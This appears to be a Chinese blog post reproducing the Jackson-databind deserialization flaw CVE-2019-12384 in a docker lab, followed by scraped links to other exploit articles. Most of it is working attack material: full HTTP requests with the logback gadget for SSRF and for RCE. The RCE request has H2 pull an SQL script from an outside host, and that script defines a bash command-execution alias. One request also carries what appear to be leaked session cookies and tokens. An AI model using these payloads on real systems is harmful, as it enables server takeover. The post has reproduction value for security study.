前言

由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。

影响版本

Jackson-databind 2.0.0 ~2.9.9.1

环境搭建

创建一个docker-compose.yml的文件

version: '2'services:web:image: tech1iu/servlet-with-jackson:2.9.8container_name: jackson-fuckmeports:-  "8080:8080"

然后使用docker安装docker-compose up -d

访问http://your-IP:8080/fuckme

漏洞复现

SSRF

发生数据包

POST /fuckme HTTP/1.1
Host: your-IP:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: pro_end=-1; ltd_end=-1; order=id%20desc; memSize=2978; sites_path=/www/wwwroot; serverType=nginx; backup_path=/www/backup; force=0; load_page=null; load_search=undefined; pnull=nullnot_load; uploadSize=1073741824; rank=a; SetName=; site_type=-1; ChangePath=3; vcodesum=9; SESScc3cfa2752cb20299766315b04dc7f8a=DUjfNVloT1dZgF2MyF2qjBGeEIPVWnRLF2aOvs7q808; request_token=S3WKG02B2DYSeyCaHQrfoZQfUirBwH1eq6sg9SYYhZnrvWFN; softType=10; load_type=10; Path=/www/server/panel/plugin/free_waf; aceEditor=%7B%22fontSize%22%3A%2213px%22%2C%22theme%22%3A%22monokai%22%7D
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 113poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://192.168.220.137:1888/~/test"}]

RCE

恶意文件inject.sql内容如下:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {String[] command = {"bash", "-c", cmd};java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('ping 1.1.1.1')

构建数据包

POST /fuckme HTTP/1.1
Host: your-IP:8080
Proxy-Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.80.133:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 169
Content-Type: application/x-www-form-urlencodedpoc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.220.137:8080/inject.sql'"}]

的确有ping数据包

从反序列化->SSRF->RCE

Jackson 远程命令执行漏洞(CVE-2019-12384)相关推荐

  1. flexpaper php 代码,FlexPaper 2.3.6 远程命令执行漏洞 附Exp

    影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...

  2. 【注意】关于Redis存在远程命令执行漏洞的安全公告

    点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 来源:CNVD漏洞平台 安全公告编号:CNTA-2019-0024 2019年7月10日,国 ...

  3. rmi远程反序列化rce漏洞_Oracle WebLogic 反序列化远程命令执行漏洞预警

    报告编号:B6-2019-041901 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-04-19 0x00 事件背景 2019年4月17日,国家信息安全漏洞共享平台(CN ...

  4. 远程执行漏洞修复方案_请马上修复!SaltStack远程命令执行漏洞

    [漏洞预警]SaltStack远程命令执行漏洞(CVE-2020-11651.CVE-2020-11652) 2020年5月3日,阿里云应急响应中心监测到近日国外某安全团队披露了SaltStack存在 ...

  5. 详述WebLogic反序列化远程命令执行漏洞的处理过程,云和恩墨技术通讯精选

    各位亲爱的用户/读者朋友们: 为了及时共享行业案例,通告共性问题,达成知识共享和提前预防,我们整理和编辑了<云和恩墨技术通讯>(5月刊),通过对过去一段时间的知识回顾和故障归纳,以期提供有 ...

  6. CVE-2019-19781 Citrix ADCNetScaler远程命令执行漏洞

    未经允许,不得擅自转载,违者必究 一.前言 @Adminxe 因为最近在刷edusrc,由此发现这个漏洞,涉及多所高校,所以过来给大家实战POC测试一波,可直接进行命令执行,Citrix产品中的漏洞使 ...

  7. 邮件传输代理Exim远程命令执行漏洞细节披露,影响全球近一半邮件服务器

    注意:是远程命令执行,不是远程代码执行 Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件.该软件主要运行于类UNIX系统 ...

  8. 【知道创宇404实验室】Oracle WebLogic远程命令执行漏洞预警

    2019年04月17日,国家信息安全漏洞共享平台(CNVD)官方发布安全公告 http://www.cnvd.org.cn/webinfo/show/4989 称Oracle WebLogic wls ...

  9. webmin远程命令执行漏洞(cve-2019-15107)深入分析

    漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...

最新文章

  1. QIIME 2用户文档. 18使用q2-vsearch聚类OTUs(2018.11)
  2. war包解压不了_牛骨高汤的熬制方法,拿走不谢!有了这配方,还愁开不了小吃店?...
  3. Windows Server 2008壮烈牺牲
  4. gulp打包js/css时合并成一个文件时的顺序解决
  5. get_magic_quotes_gpc异常
  6. 数据结构实验之栈与队列五:下一较大值(一)
  7. 辰星计划2022 | 旷视研究院春季实习生招募开始啦!
  8. WinPcap获取网卡的更多信息
  9. 初次使用Apache、ip地址、防火墙、域名、DNS、hosts文件、端口、URL介绍、Apache配置文件、配置虚拟主机、请求响应、http协议、
  10. Java字符串排序后输出
  11. oracle用plsql导出表结构与数据
  12. 计算机无法打开浏览器,win7电脑打开ie浏览器被提示“该页无法显示”怎么解决...
  13. 颜色六位码和八位码表示
  14. Java setlocale方法_Java Locale.Builder setLocale(Locale)用法及代码示例
  15. python 爬虫图片打不开_爬虫下载图片打不开是什么原因,最新简易爬虫教程
  16. 电容或电感的电压_电流,电压,电阻,电容和电感
  17. Cg学习之01_vertex_program
  18. 资本支出 capital expenditure(capex)
  19. 如何让div靠右_如何让div靠右
  20. 注册教育邮箱免费使用pycharm专业版一年

热门文章

  1. 常识、言语篇——2021国考考前三个月复习计划
  2. unicode字符范围(包括中文、日语、韩文和各种特殊字符集)
  3. nas918+支持的cpu_PC硬件与外设 篇六十一:这次稳了吧?细节设计提升的九州风神AS500 Plus 风冷散热器搭配苏妈3800X实测_CPU散热器...
  4. MYO:体感新玩法,生物电感应
  5. PotPlayer降噪处理和人声增强
  6. css多行注释代码,css多行注释怎么写
  7. GM/T 0031电子签章和C0119电子签章的区别
  8. 老人地摊淘到旧书 发现刊有老伴年轻照片(图)
  9. 找回浏览器记住的密码
  10. 全网最细,实测可用!Iconfont阿里巴巴矢量库的使用,将icon图标引入前端页面